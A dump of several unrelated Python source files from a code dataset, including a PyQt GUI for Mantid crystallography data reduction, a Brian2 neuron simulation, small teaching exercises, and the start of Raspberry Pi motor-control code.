self.hide_satellites()\n self.cross_terms = self.toBool(params_dictionary[ \"cross_terms\" ])\n self.cross_terms_chbx.setChecked(self.cross_terms)\n self.save_mod_info = self.toBool(params_dictionary[ \"save_mod_info\" ])\n self.save_mod_info_chbx.setChecked(self.save_mod_info) \n self.sat_peak_radius = str(params_dictionary[ \"satellite_peak_size\" ])\n self.sat_peak_radius_ledt.setText(self.sat_peak_radius)\n self.sat_peak_region_radius = str(params_dictionary[ \"satellite_region_radius\" ])\n self.sat_peak_region_radius_ledt.setText(self.sat_peak_region_radius)\n self.sat_peak_inner_radius = str(params_dictionary[ \"satellite_background_inner_size\" ])\n self.sat_peak_inner_radius_ledt.setText(self.sat_peak_inner_radius)\n self.sat_peak_outer_radius = str(params_dictionary[ \"satellite_background_outer_size\" ])\n self.sat_peak_outer_radius_ledt.setText(self.sat_peak_outer_radius)\n\n def change_instrument(self):\n self.instrument = self.instrument_cmbx.currentText()\n\n def change_laueGroup(self):\n self.laueGroup = self.laueGroup_cmbx.currentText()\n self.pointGroup_cmbx.clear()\n list1 = []\n if self.laueGroup == \"Triclinic\":\n list1 = [\n self.tr('-1'),\n self.tr('1'),\n ]\n elif self.laueGroup == \"Monoclinic\":\n list1 = [\n self.tr('2/m'),\n self.tr('2'),\n self.tr('m'),\n self.tr('112'),\n self.tr('112/m'),\n self.tr('11m'),\n ]\n elif self.laueGroup == \"Orthorhombic\":\n list1 = [\n self.tr('mmm'),\n self.tr('222'),\n self.tr('mm2'),\n self.tr('2mm'),\n self.tr('m2m'),\n ]\n elif self.laueGroup == \"Tetragonal\":\n list1 = [\n self.tr('4/m'),\n self.tr('4/mmm'),\n self.tr('-4'),\n self.tr('-42m'),\n self.tr('-4m2'),\n self.tr('4'),\n self.tr('422'),\n self.tr('4mm'),\n ]\n elif self.laueGroup == \"Rhombohedral\":\n list1 = [\n self.tr('-3'),\n self.tr('-3m'),\n self.tr('3'),\n self.tr('32'),\n self.tr('3m'),\n self.tr('-3 r'),\n self.tr('-31m'),\n self.tr('-3m r'),\n self.tr('3 r'),\n self.tr('312'),\n self.tr('31m'),\n self.tr('32 r'),\n self.tr('321'),\n self.tr('3m r'),\n self.tr('3m1'),\n ]\n elif self.laueGroup == \"Hexagonal\":\n list1 = [\n self.tr('6/m'),\n self.tr('6/mmm'),\n self.tr('6'),\n self.tr('-6'),\n self.tr('622'),\n self.tr('6mm'),\n self.tr('-62m'),\n self.tr('-6m2'),\n ]\n elif self.laueGroup == \"Cubic\":\n list1 = [\n self.tr('m-3'),\n self.tr('m-3m'),\n self.tr('23'),\n self.tr('432'),\n self.tr('-43m'),\n ]\n self.pointGroup_cmbx.addItems(list1)\n\n\n def change_pointGroup(self):\n self.pointGroup = self.pointGroup_cmbx.currentText()\n\n def change_centering(self):\n self.centering = self.centering_cmbx.currentText()\n self.laueGroup_cmbx.clear()\n list1 = []\n if self.centering == \"P\":\n list1 = [\n self.tr('Triclinic'),\n self.tr('Monoclinic'),\n self.tr('Orthorhombic'),\n self.tr('Tetragonal'),\n self.tr('Rhombohedral'),\n self.tr('Hexagonal'),\n self.tr('Cubic'),\n ]\n elif self.centering == \"I\":\n list1 = [\n self.tr('Tetragonal'),\n self.tr('Monoclinic'),\n self.tr('Cubic'),\n self.tr('Orthorhombic'),\n ]\n elif self.centering == \"C\":\n list1 = [\n self.tr('Monoclinic'),\n self.tr('Orthorhombic'),\n ]\n elif self.centering == \"F\":\n list1 = [\n self.tr('Orthorhombic'),\n self.tr('Cubic'),\n ]\n elif self.centering == \"R\":\n list1 = [\n self.tr('Rhombohedral'),\n ]\n self.laueGroup_cmbx.addItems(list1)\n\n def input_z_score(self):\n self.z_score = self.toDouble(self.z_score_ledt.text())\n\n def input_bkg_inner_radius(self):\n self.bkg_inner_radius = self.toDouble(self.bkg_inner_radius_ledt.text())\n\n def input_bkg_outer_radius(self):\n self.bkg_outer_radius = self.toDouble(self.bkg_outer_radius_ledt.text())\n\n def change_Configfile(self):\n self.ConfigFileName = self.ConfigFileName_ledt.text()\n if self.ConfigFileName != \"None\":\n self.loadConfig(self.ConfigFileName)\n\n def change_SAfile(self):\n self.SAFile = self.SAFile_ledt.text()\n\n def change_Fluxfile(self):\n self.FluxFile = self.FluxFile_ledt.text()\n\n def change_UBfile(self):\n self.UBFileName = str(self.UBFileName_ledt.text())\n if self.UBFileName != \"None\" and self.UBFileName != \"\":\n self.read_UB = True\n else:\n self.read_UB = False\n self.UBFileName = \"None\"\n\n def change_spectra_file(self):\n self.spectraFileName = self.spectraFileName_ledt.text()\n\n def change_file(self):\n self.backgroundFileName = self.BackgroundFileName_ledt.text()\n if self.backgroundFileName != \"None\" and self.backgroundFileName != \"\":\n self.subtract_bkg = True\n else:\n self.subtract_bkg = False\n self.backgroundFileName = \"None\"\n\n def change_cal_file(self):\n self.calFileName = self.CalFileName_ledt.text()\n if self.calFileName == \"\":\n self.calFileName = \"None\"\n\n def change_datadir(self):\n self.dataDirectory = self.dataDirectory_ledt.text()\n if self.dataDirectory == \"\":\n self.dataDirectory = \"None\"\n\n def Configbrowse_file(self):\n self.ConfigFileName, _filter = QtWidgets.QFileDialog.getOpenFileName(self, 'Open File', '', '*.config') # Filename line\n if self.ConfigFileName:\n self.ConfigFileName_ledt.setText(self.ConfigFileName)\n\n def SAbrowse_file(self):\n self.SAFile, _filter = QtWidgets.QFileDialog.getOpenFileName(self, 'Open File', '', '*.nxs *.h5') # Filename line\n if self.SAFile:\n self.SAFile_ledt.setText(self.SAFile)\n\n def Fluxbrowse_file(self):\n self.FluxFile, _filter = QtWidgets.QFileDialog.getOpenFileName(self, 'Open File', '', '*.nxs *.h5') # Filename line\n if self.FluxFile:\n self.FluxFile_ledt.setText(self.FluxFile)\n\n def UBbrowse_file(self):\n self.UBFileName, _filter = QtWidgets.QFileDialog.getOpenFileName(self, 'Open File', '', '*.mat') # Filename line\n if self.UBFileName:\n self.UBFileName_ledt.setText(self.UBFileName)\n\n def browse_spectra_file(self):\n self.spectraFileName, _filter = QtWidgets.QFileDialog.getOpenFileName(self, 'Open File', '', '*.dat') # Filename line\n if self.spectraFileName:\n self.spectraFileName_ledt.setText(self.spectraFileName)\n\n def browse_file(self):\n self.backgroundFileName, _filter = QtWidgets.QFileDialog.getOpenFileName(self, 'Open File', '', '*.nxs *.h5') # Filename line\n if self.backgroundFileName:\n self.BackgroundFileName_ledt.setText(self.backgroundFileName)\n\n def browse_cal_file(self):\n self.calFileName, _filter = QtWidgets.QFileDialog.getOpenFileName(self, 'Open File', '', '*.DetCal') # Filename line\n if self.calFileName:\n self.CalFileName_ledt.setText(self.calFileName)\n\n def browse_datadir(self):\n self.dataDirectory = QtWidgets.QFileDialog.getExistingDirectory(self, 'Select Directory', '', options=QtWidgets.QFileDialog.ShowDirsOnly)\n if self.dataDirectory:\n self.dataDirectory_ledt.setText(self.dataDirectory)\n\n def change_pred_minDSpacing(self):\n self.pred_minDSpacing = self.toDouble(self.pred_minDSpacing_ledt.text())\n\n def change_pred_maxDSpacing(self):\n self.pred_maxDSpacing = self.toDouble(self.pred_maxDSpacing_ledt.text())\n\n def change_pred_minWavelength(self):\n self.pred_minWavelength = self.toDouble(self.pred_minWavelength_ledt.text())\n\n def change_pred_maxWavelength(self):\n self.pred_maxWavelength = self.toDouble(self.pred_maxWavelength_ledt.text())\n\n def change_minDSpacing(self):\n self.minDSpacing = self.toDouble(self.minDSpacing_ledt.text())\n\n def change_minWavelength(self):\n self.minWavelength = self.toDouble(self.minWavelength_ledt.text())\n\n def change_maxWavelength(self):\n self.maxWavelength = self.toDouble(self.maxWavelength_ledt.text())\n\n def change_sampleRadius(self):\n self.sampleRadius = self.toDouble(self.sampleRadius_ledt.text())\n\n def change_molecularFormula(self):\n self.molecularFormula = self.molecularFormula_ledt.text()\n\n def change_expName(self):\n self.expName = self.expName_ledt.text()\n\n def change_runNums(self):\n self.runNums = str(self.runNums_ledt.text())\n\n def change_Z(self):\n self.Z = self.toDouble(self.Z_ledt.text())\n\n def change_unitCellVolume(self):\n self.unitCellVolume = self.toDouble(self.unitCellVolume_ledt.text())\n\n def change_splitThreshold(self):\n temp = self.splitThreshold_ledt.text()\n self.splitThreshold = self.toInt(temp)\n\n def change_maxQ(self):\n self.maxQ = self.toDouble(self.maxQspace_ledt.text())\n try:\n self.maxQspace_ledt_2.setText(str(2*math.pi/self.maxQ))\n except:\n self.maxQspace_ledt_2.setText('')\n\n def change_maxQ2(self):\n #Dmin is specified instead of Qmax\n d = self.toDouble(self.maxQspace_ledt_2.text())\n try:\n self.maxQ = 2*math.pi/d\n self.maxQspace_ledt.setText(str(self.maxQ))\n except:\n self.maxQspace_ledt.setText('')\n \n def change_tolerance_satellite(self):\n self.tolerance_satellite = self.toDouble(self.tolerance_satellite_ledt.text())\n\n def change_mod_vec_1_dh(self):\n self.mod_vec_1_dh = self.toDouble(self.mod_vec_1_dh_ledt.text())\n \n def change_mod_vec_1_dk(self): \n self.mod_vec_1_dk = self.toDouble(self.mod_vec_1_dk_ledt.text())\n \n def change_mod_vec_1_dl(self): \n self.mod_vec_1_dl = self.toDouble(self.mod_vec_1_dl_ledt.text())\n \n def change_mod_vec_2_dh(self):\n self.mod_vec_2_dh = self.toDouble(self.mod_vec_2_dh_ledt.text())\n \n def change_mod_vec_2_dk(self): \n self.mod_vec_2_dk = self.toDouble(self.mod_vec_2_dk_ledt.text())\n \n def change_mod_vec_2_dl(self): \n self.mod_vec_2_dl = self.toDouble(self.mod_vec_2_dl_ledt.text())\n \n def change_mod_vec_3_dh(self):\n self.mod_vec_3_dh = self.toDouble(self.mod_vec_3_dh_ledt.text())\n \n def change_mod_vec_3_dk(self): \n self.mod_vec_3_dk = self.toDouble(self.mod_vec_3_dk_ledt.text())\n \n def change_mod_vec_3_dl(self): \n self.mod_vec_3_dl = self.toDouble(self.mod_vec_3_dl_ledt.text())\n\n def change_max_order(self): \n self.max_order = self.toInt(self.max_order_ledt.text())\n \n def change_cross_terms(self): \n self.cross_terms = self.toBool(self.cross_terms_chbx.isChecked())\n \n def change_save_mod_info(self): \n self.save_mod_info = self.toBool(self.save_mod_info_chbx.isChecked())\n \n def change_sat_peak_region_radius(self): \n self.sat_peak_radius = self.toDouble(self.sat_peak_region_radius_ledt.text())\n \n def change_sat_peak_radius(self): \n self.sat_peak_radius = self.toDouble(self.sat_peak_radius_ledt.text())\n\n def change_sat_peak_inner_radius(self): \n self.sat_peak_inner_radius = self.toDouble(self.sat_peak_inner_radius_ledt.text())\n\n def change_sat_peak_outer_radius(self): \n self.sat_peak_outer_radius = self.toDouble(self.sat_peak_outer_radius_ledt.text())\n \n def toBool(self, temp):\n try:\n result = bool(temp)\n except:\n result = None\n return result\n \n def toInt(self, temp):\n try:\n result = int(temp)\n except:\n result = None\n return result\n\n def toFloat(self, temp):\n # for python strings\n try:\n if type(temp) is float:\n return temp\n elif '.' in temp or \"e\" in temp:\n result = float(temp)\n else:\n temp_int = int(temp)\n result = float(temp_int)\n except:\n result = None\n return result\n\n def toDouble(self, temp):\n try:\n # for qt strings\n if str(\"%s\" % temp)==\"-\":\n return 0.\n if '.' in temp or \"e\" in temp:\n result = float(temp)\n else:\n temp_int = int(temp)\n result = float(temp_int)\n except:\n result = None\n return result\n \n def change_live(self, state):\n if state == QtCore.Qt.Checked:\n self.live = True\n else:\n self.live = False\n\n def plot_modStruct(self, state):\n if state == QtCore.Qt.Checked:\n self.modStruct = True\n else:\n self.modStruct = False\n\n def predict_peaks(self, state):\n if state == QtCore.Qt.Checked:\n self.predictPeaks = str( True)\n self.pred_minDSpacing_ledt.setEnabled(True)\n self.pred_maxDSpacing_ledt.setEnabled(True)\n self.pred_minWavelength_ledt.setEnabled(True)\n self.pred_maxWavelength_ledt.setEnabled(True)\n # self.mod_vec_1_dh_ledt.setEnabled(True)\n # self.mod_vec_1_dk_ledt.setEnabled(True)\n # self.mod_vec_1_dl_ledt.setEnabled(True)\n # self.mod_vec_2_dh_ledt.setEnabled(True)\n # self.mod_vec_2_dk_ledt.setEnabled(True)\n # self.mod_vec_2_dl_ledt.setEnabled(True)\n # self.mod_vec_3_dh_ledt.setEnabled(True)\n # self.mod_vec_3_dk_ledt.setEnabled(True)\n # self.mod_vec_3_dl_ledt.setEnabled(True)\n # self.max_order_ledt.setEnabled(True)\n # self.cross_terms_chbx.setEnabled(True)\n else:\n self.predictPeaks = str( False)\n self.pred_minDSpacing_ledt.setDisabled(True)\n self.pred_maxDSpacing_ledt.setDisabled(True)\n self.pred_minWavelength_ledt.setDisabled(True)\n self.pred_maxWavelength_ledt.setDisabled(True)\n # self.mod_vec_1_dh_ledt.setDisabled(True)\n # self.mod_vec_1_dk_ledt.setDisabled(True)\n # self.mod_vec_1_dl_ledt.setDisabled(True)\n # self.mod_vec_2_dh_ledt.setDisabled(True)\n # self.mod_vec_2_dk_ledt.setDisabled(True)\n # self.mod_vec_2_dl_ledt.setDisabled(True)\n # self.mod_vec_3_dh_ledt.setDisabled(True)\n # self.mod_vec_3_dk_ledt.setDisabled(True)\n # self.mod_vec_3_dl_ledt.setDisabled(True)\n # self.max_order_ledt.setDisabled(True)\n # self.cross_terms_chbx.setDisabled(True)\n \n def ellipse_size(self, state):\n if state == QtCore.Qt.Checked:\n self.ellipse_size_specified = str( True)\n else:\n self.ellipse_size_specified = str( False)\n\n def change_numPeaks(self):\n temp = self.numberPeaks_ledt.text()\n self.numPeaksToFind = self.toInt(temp)\n\n def change_minABC(self):\n self.abcMin = self.toDouble(self.minABC_ledt.text())\n\n def change_maxABC(self):\n self.abcMax = self.toDouble(self.maxABC_ledt.text())\n\n def change_tolerance(self):\n self.tolerance = self.toDouble(self.tolerance_ledt.text())\n\n def change_peakRadius(self):\n self.peakRadius = self.toDouble(self.peakRadius_ledt.text())\n\n def change_minIntensity(self):\n self.minIntensity = self.toDouble(self.minIntensity_ledt.text())\n\n def change_normToWavelength(self):\n self.normToWavelength = self.toDouble(self.normToWavelength_ledt.text())\n\n def change_minIsigI(self):\n self.minIsigI = self.toDouble(self.minIsigI_ledt.text())\n\n def change_starting_batch_number(self):\n temp = self.starting_batch_number_ledt.text()\n self.starting_batch_number = self.toInt(temp)\n\n def change_edgePixels(self):\n temp = self.edgePixels_ledt.text()\n self.edgePixels = self.toInt(temp)\n\n def change_borderPixels(self):\n temp = self.borderPixels_ledt.text()\n self.borderPixels = self.toInt(temp)\n\n def change_scaleFactor(self):\n self.scaleFactor = self.toDouble(self.scaleFactor_ledt.text())\n\n def reject(self):\n print (\"script has been killed\")\n os.killpg(os.getpgid(self.proc.pid), signal.SIGTERM)\n \n def accept(self):\n #Generate config file\n if (self.expName == ''):\n print (\"Enter an experiment name\")\n elif (self.molecularFormula == ''): \n print (\"Enter a valid molecular formula\")\n else:\n baseDir = os.getcwd()\n outDir = baseDir[:baseDir.find(\"shared\")]+\"shared/\"+self.expName\n print (\"Working directory: \",outDir)\n pg = self.pointGroup\n print (\"Point group: \",pg)\n kw = {\n \"molecularFormula\": self.molecularFormula,\n \"Z\": self.Z,\n \"unitCellVolume\": self.unitCellVolume,\n \"sampleRadius\": self.sampleRadius,\n \"instrument\": self.instrument,\n \"calFileName\": self.calFileName,\n \"maxQ\": self.maxQ,\n \"split_threshold\": self.splitThreshold,\n \"backgroundFileName\": self.backgroundFileName,\n \"subtract_bkg\": self.subtract_bkg,\n \"outputDirectory\": outDir,\n \"data_directory\": self.dataDirectory,\n \"UB_filename\": self.UBFileName,\n \"read_UB\": self.read_UB,\n \"centering\": self.centering,\n \"cell_type\": self.laueGroup,\n \"numPeaksToFind\": self.numPeaksToFind,\n \"abcMin\": self.abcMin,\n \"abcMax\": self.abcMax,\n \"tolerance\": self.tolerance,\n \"predictPeaks\": self.predictPeaks,\n \"min_pred_dspacing\": self.pred_minDSpacing,\n \"max_pred_dspacing\": self.pred_maxDSpacing,\n \"min_pred_wl\": self.pred_minWavelength,\n \"max_pred_wl\": self.pred_maxWavelength,\n \"peak_radius\": self.peakRadius,\n \"bkg_inner_radius\": self.bkg_inner_radius,\n \"bkg_outer_radius\": self.bkg_outer_radius,\n \"ellipse_size_specified\": self.ellipse_size_specified,\n \"n_bad_edge_pixels\": self.edgePixels,\n \"exp_name\": self.expName,\n \"run_nums\": self.runNums,\n \"spectraFileName\": self.spectraFileName,\n \"normToWavelength\": self.normToWavelength,\n \"minIsigI\": self.minIsigI,\n \"numBorderCh\": self.borderPixels,\n \"minIntensity\": self.minIntensity,\n \"min_dspacing\": self.minDSpacing,\n \"scaleFactor\": self.scaleFactor,\n \"min_wl\": self.minWavelength,\n \"max_wl\": self.maxWavelength,\n \"pg_symbol\": pg,\n \"z_score\": self.z_score,\n \"starting_batch_number\": self.starting_batch_number,\n \"tolerance_satellite\": self.tolerance_satellite,\n \"mod_vector1\": \"{},{},{}\".format(self.mod_vec_1_dh, self.mod_vec_1_dk, self.mod_vec_1_dl),\n \"mod_vector2\": \"{},{},{}\".format(self.mod_vec_2_dh, self.mod_vec_2_dk, self.mod_vec_2_dl),\n \"mod_vector3\": \"{},{},{}\".format(self.mod_vec_3_dh, self.mod_vec_3_dk, self.mod_vec_3_dl),\n \"max_order\": self.max_order,\n \"cross_terms\": self.cross_terms,\n \"save_mod_info\": self.save_mod_info,\n \"satellite_peak_size\": self.sat_peak_radius,\n \"satellite_region_radius\": self.sat_peak_region_radius,\n \"satellite_background_inner_size\": self.sat_peak_inner_radius,\n \"satellite_background_outer_size\": self.sat_peak_outer_radius,\n }\n # if value in dictionary is missing, set to None\n for key in list(kw.keys()):\n if not kw[key]:\n kw[key] = \"None\"\n\n templatePath = \"./mod3/example_sat_q00_0q0_bkg.config\"\n self.path = self.expName+\".config\"\n self.format_template(templatePath, self.path, **kw)\n self.plotConfig()\n\n def plotConfig(self):\n import configparser\n \n filename = './plotConfig.ini'\n baseDir = os.getcwd()\n UBDirectory = baseDir[:baseDir.find(\"shared\")]+\"shared/\"+self.expName + \"/\" \n config = configparser.ConfigParser()\n config['PLOT1'] = {'axis1': self._h1,\n 'axis2': self._k1,\n 'axis3': self._l1,\n 'xmin': self._xmin1,\n 'xmax': self._xmax1,\n 'xsteps': self._xsteps1,\n 'ymin': self._ymin1,\n 'ymax': self._ymax1,\n 'ysteps': self._ysteps1,\n 'zmin': self._zmin1,\n 'zmax': self._zmax1}\n config['PLOT2'] = {'axis1': self._h2,\n 'axis2': self._k2,\n 'axis3': self._l2,\n 'xmin': self._xmin2,\n 'xmax': self._xmax2,\n 'xsteps': self._xsteps2,\n 'ymin': self._ymin2,\n 'ymax': self._ymax2,\n 'ysteps': self._ysteps2,\n 'zmin': self._zmin2,\n 'zmax': self._zmax2}\n config['PLOT3'] = {'axis1': self._h3,\n 'axis2': self._k3,\n 'axis3': self._l3,\n 'xmin': self._xmin3,\n 'xmax': self._xmax3,\n 'xsteps': self._xsteps3,\n 'ymin': self._ymin3,\n 'ymax': self._ymax3,\n 'ysteps': self._ysteps3,\n 'zmin': self._zmin3,\n 'zmax': self._zmax3}\n config['REDUCTION'] = {'CalFile': self.calFileName,\n 'UBDirectory': UBDirectory}\n config['NORMALIZATION'] = {'SAFile': self.SAFile,\n 'FluxFile': self.FluxFile}\n with open(filename, 'w') as configfile:\n config.write(configfile)\n \n\n\n def auto(self):\n self.accept()\n baseDir = os.getcwd()\n timestr = time.strftime(\"%Y%m%d-%H%M%S\")\n autoConfig = baseDir[:baseDir.find(\"shared\")]+\"shared/autoreduce/autoreduce\"+timestr+\".config\"\n copyfile(self.path, autoConfig)\n autoPlotConfig = baseDir[:baseDir.find(\"shared\")]+\"shared/autoreduce/plotConfig\"+timestr+\".ini\"\n\n copyfile('./plotConfig.ini', autoPlotConfig)\n \n\n def run(self):\n self.accept()\n if self.live is True:\n self.proc = Popen(['/bin/mantidpythonnightly','runMantidEV.py', str(self.path)])\n else:\n self.proc = Popen(['/bin/mantidpythonnightly','mod3/topaz_reduction_mod.py', str(self.path)])\n if self.modStruct:\n self.proc.wait()\n Popen(['/bin/mantidpythonnightly','ModulatedStructurePlot.py', str(self.path)])\n\ndef main():\n app = QtWidgets.QApplication(sys.argv) # A new instance of QApplication\n form = MantidReduction() # We set the form to be our MantidReduction (design)\n form.show() # Show the form\n app.exec_() # and execute the app\n os.system('stty sane')\n\n\nif __name__ == '__main__': # if we're running file directly and not importing it\n main() # run the main function\n","sub_path":"TOPAZ/ReductionGUI/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":49320,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"356975102","text":"from brian2 import *\n\n\nnum_neurons = 3\nduration = 200*ms\n\n# Parameters\na = 0.1/ms #reflects recovery timescale\nb = 0.2 # smaller values couple v and u more closely\nc = -65.0 #resting potential\nd = 2 #after spike recovery of u\ntau_m=2*ms\ntau_ampa=3*ms\ng_peak=4\ng_peak_in = -4\ntranswdth=1.0*ms\n\n#The model\n#to add noise +5*xi*tau_m**.5/ms\neqs = '''\ndv/dt = (0.04*(v**2) + 5*v + 140 - u + I + g_ampa + g_gaba)/ms : 1\ndu/dt = a * ((b*v) - u) : 1\n\ndg_ampa/dt = (-g_ampa/tau_ampa*ms + z)/ms: 1 \ndz/dt = (-z/tau_ampa + g_syn*Tr_pre/ms) : 1 \ng_syn = g_peak / (tau_ampa/ms*exp(-1)): 1\nTr_pre=.25*(tanh((t/ms-tspike/ms)/.005)-tanh((t/ms-(tspike/ms +transwdth/ms))/.005)):1\n\ndg_gaba/dt = -g_gaba/tau_ampa + zg/ms: 1 \ndzg/dt = (-zg/tau_ampa + gg_syn*Tr_pre/ms) : 1 \ngg_syn = g_peak_in / (tau_ampa/ms*exp(-1)): 1\n\nI : 1\ntspike :second\n'''\n#\n# Threshold and refractoriness are only used for spike counting\ngroup = NeuronGroup(num_neurons, eqs,\n threshold='v > 30',\n refractory='v > 40',\n reset='''v = c\n u=u+d\n tspike = t\n ''')\n\ngroup.v = c\ngroup.u = 0\ngroup.I = [10,0,8]\ngroup.g_ampa = 0\ngroup.g_gaba = 0\ngroup.tspike=-100.0*ms\n\nS = Synapses(group, group, on_pre='''\ng_ampa_post += 0\nz_post += g_peak\n''')\nS.connect(i=0, j=1)\ninS = Synapses(group, group, on_pre='''\nzg_post += -g_peak\ng_gaba_post += 0\n''')\ninS.connect(i=1, j=2)\n\n\nmonitor = SpikeMonitor(group)\nmonitor2 = StateMonitor(group, ('v', 'g_ampa', 'g_gaba'), record=True)\nrun(duration)\n\nfigure(figsize=(12,4))\nsubplot(3,1,1)\nxlim(0,100)\nylabel('Membrane potential')\nxlabel('t(ms)')\nplot(monitor2.t/ms, monitor2.v[0]) #plot the voltage for neuron 0 (index starts at 0)\nsubplot(3,1,2)\nxlim(0,100)\nylabel('Membrane potential')\nxlabel('t(ms)')\nplot(monitor2.t/ms, monitor2.v[1])\nsubplot(3,1,3)\n\nplot(monitor2.t/ms, monitor2.v[2]) \nxlim(0,100)\nylabel('Membrane potential')\nxlabel('t(ms)')\n\n\n#figure(2)\n#plot(monitor2.t/ms, monitor2.v[0]/mV) #plot the voltage for neuron 0 (index starts at 0)\n#ylim(-80,60) #set axes limits\n\nshow()","sub_path":"BME modeling/code/2_iz_connect.py","file_name":"2_iz_connect.py","file_ext":"py","file_size_in_byte":2091,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"52368004","text":"class clock:\n def __init__(self, hour, min, sec ):\n self.hour = hour\n self.min = min\n self.sec = sec\n\n def GetTime(self):\n return self.hour, self.min, self.sec \n\n\n def SetTime(self, hour, min, sec):\n self.hour = hour\n self.min = min\n self.sec = sec\n\n\nC1 = clock(3, 20, 0)\nC2 = clock(2, 20, 0)\nC3 = clock(4, 20, 0)\nC4 = clock(5, 20, 0)\nC5 = clock(6, 20, 0)\nC6 = clock(7, 20, 0)\n\n\nprint(C3.GetTime())\n\n\n","sub_path":"Jaar 1/OP3/ANAL3/WEEK1/programmes/clock.py","file_name":"clock.py","file_ext":"py","file_size_in_byte":453,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"522092432","text":"\"\"\"\nPeça um número ao usuário e, em seguida, informe se o\nnúmero é múltiplo de dez ou não.\n\"\"\"\n\nnúmero = int(input(\"Digite um número: \"))\n\nif número % 10 == 0:\n print(str(número) + \" é multiplo de 10\")\nelse:\n print(str(número) + \" não é multiplo de 10\")","sub_path":"FAÇA VOCÊ MESMO/7.3_multiplos_de_dez.py","file_name":"7.3_multiplos_de_dez.py","file_ext":"py","file_size_in_byte":274,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"407357853","text":"num = int(input())\nfor i in range(num):\n number=int(input())\n TList=input().split()\n CanList=list(set(TList))\n TNList=[]\n count=0\n for candidate in CanList:\n TNList.append(0)\n for index in range(len(TList)):\n if candidate==TList[index]:\n TNList[count]=TNList[count]+1\n count=count+1\n\n for j in range(len(TNList)):\n for l in range(len(TNList) - 1):\n if TNList[l] < TNList[l + 1]:\n temp = TNList[l]\n TNList[l] = TNList[l + 1]\n TNList[l + 1] = temp\n\n temp = CanList[l]\n CanList[l] = CanList[l + 1]\n CanList[l + 1] = temp\n\n MaxCan=[]\n MaxCan.append(CanList[0])\n for nI in range(len(TNList)-1):\n if TNList[nI]!=TNList[nI+1]:\n break\n elif TNList[nI]==TNList[nI+1]:\n MaxCan.append(CanList[nI+1])\n MaxCan.sort()\n print(MaxCan[0]+' '+str(TNList[0]))","sub_path":"Code/CodeRecords/2487/60625/247200.py","file_name":"247200.py","file_ext":"py","file_size_in_byte":967,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"108480526","text":"import cv2\r\nimport numpy as np\r\nimport RPi.GPIO as GPIO #control motor board through GPIO pins\r\nimport time #set delay time to control moving distance\r\n\r\nGPIO.setwarnings(False)\r\n#If INL1=True and INL2=False left motor move forward, If INL1=False,INL2=True left motor move backward,in other cases left motor stop(M1)\r\nINL1 = 13 #GPIO27 to IN1 Front-left wheel direction\r\nINL2 = 15 #GPIO22 to IN2 Front-left wheel direction\r\n\r\n#If INL3=True and INL4=False left motor move forward, If INL3=False,INL4=True left motor move backward,in other cases left motor stop(M2)\r\n\r\nINL3 = 16 #GPIO23 to IN3 Rear-left wheel direction\r\nINL4 = 18 #GPIO24 to IN4 Rear-left wheel direction\r\n\r\n#ENA/ENB are PWM(analog) signal pin which control the speed of left motors through GPIO ChangeDutyCycle(speed) function\r\nENAL = 11 #GPIO17 to ENA PWM SPEED of M1 motor\r\nENBL = 22 #GPIO25 to ENB PWM SPEED of M2 motor\r\n\r\n#If INR1=True and INR2=False right motor move forward, If INL1=False,INL2=True right motor move backward,in other cases right motor stop(M3)\r\n\r\nINR1 = 21 #GPIO9 to IN1 Front-right wheel direction\r\nINR2 = 23 #GPIO11 to IN2 Front-right wheel direction\r\n\r\n\r\n#If INR3=True and INR4=False right motor move forward, If INR1=False,INR2=True right motor move backward,in other cases right motor stop(M4)\r\nINR3 = 24 #GPIO8 to IN3 Rear-right wheel direction\r\nINR4 = 26 #GPIO7 to IN4 Rear-right wheel direction\r\n\r\n#ENA/ENB are PWM(analog) signal pin which control the speed of right motors through GPIO ChangeDutyCycle(speed) function\r\nENAR = 19 #GPIO10 to ENA PWM SPEED of M3 motor\r\nENBR = 32 #GPIO12 to ENB PWM SPEED of M4 motor\r\n\r\n#ultrasonic sensor\r\nTRIG = 29\r\nECHO = 31\r\n\r\n#initialize GPIO pins, tell OS which pins will be used to control Model-Pi L298N board\r\nGPIO.setmode(GPIO.BOARD)\r\nGPIO.setup(TRIG,GPIO.OUT)\r\nGPIO.setup(ECHO,GPIO.IN)\r\nGPIO.setup(INR1, GPIO.OUT)\r\nGPIO.setup(INR2, GPIO.OUT)\r\nGPIO.setup(INR3, GPIO.OUT)\r\nGPIO.setup(INR4, GPIO.OUT)\r\nGPIO.setup(ENAL, GPIO.OUT)\r\nGPIO.setup(ENBL, GPIO.OUT)\r\nGPIO.setup(ENAR, GPIO.OUT)\r\nGPIO.setup(ENBR, GPIO.OUT)\r\nGPIO.setup(INL1, GPIO.OUT)\r\nGPIO.setup(INL2, GPIO.OUT)\r\nGPIO.setup(INL3, GPIO.OUT)\r\nGPIO.setup(INL4, GPIO.OUT)\r\nGPIO.output(ENAL,True)\r\nGPIO.output(ENBL,True)\r\nGPIO.output(ENAR,True)\r\nGPIO.output(ENBR,True)\r\n\r\n\r\n#make front right motor moving forward\r\ndef fr_ahead(speed):\r\n GPIO.output(INR1,True)\r\n GPIO.output(INR2,False)\r\n\r\n#make rear right motor moving forward \r\ndef rr_ahead(speed): \r\n GPIO.output(INR3,True)\r\n GPIO.output(INR4,False)\r\n \r\n#make front right motor moving backward\r\ndef fr_back(speed):\r\n GPIO.output(INR2,True)\r\n GPIO.output(INR1,False)\r\n\r\n#make rear right motor moving backward \r\ndef rr_back(speed): \r\n GPIO.output(INR4,True)\r\n GPIO.output(INR3,False) \r\n \r\n#make front left motor moving forward\r\ndef fl_ahead(speed):\r\n GPIO.output(INL1,True)\r\n GPIO.output(INL2,False)\r\n\r\n#make rear left motor moving forward \r\ndef rl_ahead(speed): \r\n GPIO.output(INL3,True)\r\n GPIO.output(INL4,False)\r\n \r\n \r\n#make Front left motor moving backward\r\ndef fl_back(speed):\r\n GPIO.output(INL2,True)\r\n GPIO.output(INL1,False)\r\n\r\n#make rear left motor moving backward \r\ndef rl_back(speed): \r\n GPIO.output(INL4,True)\r\n GPIO.output(INL3,False)\r\n\r\n \r\ndef go_ahead(speed):\r\n rr_ahead(speed)\r\n 